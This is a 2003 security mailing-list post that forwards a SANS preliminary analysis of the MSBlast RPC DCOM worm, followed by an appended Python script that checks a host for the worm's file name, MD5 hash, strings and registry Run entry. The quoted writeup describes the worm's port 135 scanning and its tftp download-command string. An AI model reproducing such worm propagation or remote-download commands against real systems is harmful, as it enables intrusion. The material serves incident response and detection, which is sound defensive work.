[secure] From Incidents.org - possible Dcom worm

Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] sbradcpa at pacbell.net
Mon Aug 11 19:23:23 GMT 2003


Hi!  Is it possible to forward the binaries for this worm ....or... whom
were you working with at Microsoft on this possible Dcom worm?

Bill is wanting a copy of the binaries if you have them handy.

Bill Sisk wrote:

> Susan,
>
> Can you forward the binaries so that we can investigate?
>
> Bill Sisk
> PSS Security
>
> -----Original Message-----
> From: Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]
> [mailto:sbradcpa at pacbell.net]
> Sent: Monday, August 11, 2003 12:07 PM
>
> Subject: [secure] From Incidents.org - possible Dcom worm
>
> http://isc.sans.org/diary.html?date=2003-08-11
>
> We captured a possible RPC DCOM worm. Preliminary analysis:
>
> **********
> NOTE: PRELIMINARY. Do not base your incident response solely on this
> writeup.
> **********
>
> The worm uses the RPC DCOM vulnerability to propagate. Once it finds a
> vulnerable system, it will spawn a shell and use it to download the
> actual worm via tftp.
>
> The name of the binary is msblast.exe. It is packed with UPX and will
> self extract. The size of the binary is about 11kByte unpacked, and
> 6kBytes packed:
>
> MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
>
> So far we found the following properties:
>
> - Scans sequentially for machines with open port 135, starting at a
>   presumably random IP address
> - uses multiple TFTP servers to pull the binary
> - adds a registry key to start itself after reboot
>
> Name of registry key:
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto update'
>
> Strings of interest:
>
> msblast.exe
> I just want to say LOVE YOU SAN!!
> billy gates why do you make this possible ? Stop making money and fix
> your
> software!!
> windowsupdate.com
> start %s
> tftp -i %s GET %s
> %d.%d.%d.%d
> %i.%i.%i.%i
> BILLY
> windows auto update
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: secure-unsubscribe at msmvps.com
> For additional commands, e-mail: secure-help at msmvps.com

--
"Don't lose sight of security. Security is a state of being,
not a state of budget. He with the most firewalls still does
not win. Put down that honeypot and keep up to date on your
patches. Demand better security from vendors and hold them
responsible. Use what you have, and make sure you know how
to use it properly and effectively."
~Rain Forest Puppy
http://www.wiretrip.net/rfp/txt/evolution.txt
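The indicators in the quoted ISC writeup (file name, packed MD5 and size, the 'windows auto update' Run value, and the strings of interest) are enough to build a simple host check. The script below is an added example, not code from the list post or from Incidents.org; the sample file bytes and Run-key dictionary at the bottom are constructed for the demonstration, and the optional winreg read is only exercised on Windows.

```python
import hashlib
import os

# Indicators copied from the ISC preliminary writeup quoted above.
MSBLAST_MD5_PACKED = "5ae700c1dffb00cef492844a4db6cd69"
MSBLAST_PACKED_SIZE = 6176
MSBLAST_FILENAME = "msblast.exe"
RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "windows auto update"
# Printable strings the writeup lists; two or more in one file is treated as a hit.
STRINGS_OF_INTEREST = [
    b"msblast.exe",
    b"I just want to say LOVE YOU SAN!!",
    b"tftp -i %s GET %s",
    b"windows auto update",
    b"BILLY",
]


def classify_bytes(name, data):
    """Return the indicator labels a file matches, given its name and raw bytes."""
    hits = []
    if name.lower() == MSBLAST_FILENAME:
        hits.append("filename")
    if len(data) == MSBLAST_PACKED_SIZE and hashlib.md5(data).hexdigest() == MSBLAST_MD5_PACKED:
        hits.append("md5")
    found = [s for s in STRINGS_OF_INTEREST if s in data]
    if len(found) >= 2:
        hits.append("strings:%d" % len(found))
    return hits


def scan_directory(root):
    """Walk a directory tree and return {path: hits} for every file matching an indicator."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue  # unreadable or vanished file; skip rather than abort the sweep
            hits = classify_bytes(fn, data)
            if hits:
                results[path] = hits
    return results


def check_run_entries(entries):
    """entries: {value_name: command} exported from the Run key.

    Returns (value_name, command) pairs that match the worm's persistence entry,
    either by the value name the writeup gives or by a command naming msblast.exe.
    """
    suspicious = []
    for name, cmd in entries.items():
        if name.lower() == RUN_VALUE_NAME or MSBLAST_FILENAME in str(cmd).lower():
            suspicious.append((name, cmd))
    return suspicious


def read_run_key_windows():
    """Read HKLM\\...\\Run into a dict; returns {} on non-Windows hosts."""
    try:
        import winreg
    except ImportError:
        return {}
    entries = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            entries[name] = value
            i += 1
    return entries


# Constructed sample data (not a real binary): two of the listed strings embedded in junk.
SAMPLE_DATA = b"MZ\x00\x00" + b"tftp -i %s GET %s" + b"\x00" + b"windows auto update" + b"\x00"
SAMPLE_RUN_ENTRIES = {"windows auto update": "msblast.exe", "ctfmon": "ctfmon.exe"}

if __name__ == "__main__":
    print(classify_bytes("msblast.exe", SAMPLE_DATA))
    print(check_run_entries(SAMPLE_RUN_ENTRIES))
    print(check_run_entries(read_run_key_windows()))
```

On a live host you would point scan_directory at the system root and feed read_run_key_windows() into check_run_entries; the MD5 check only fires on the exact packed sample the writeup measured, so the file-name and string checks are what catch repacked variants.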




More information about the unisog mailing list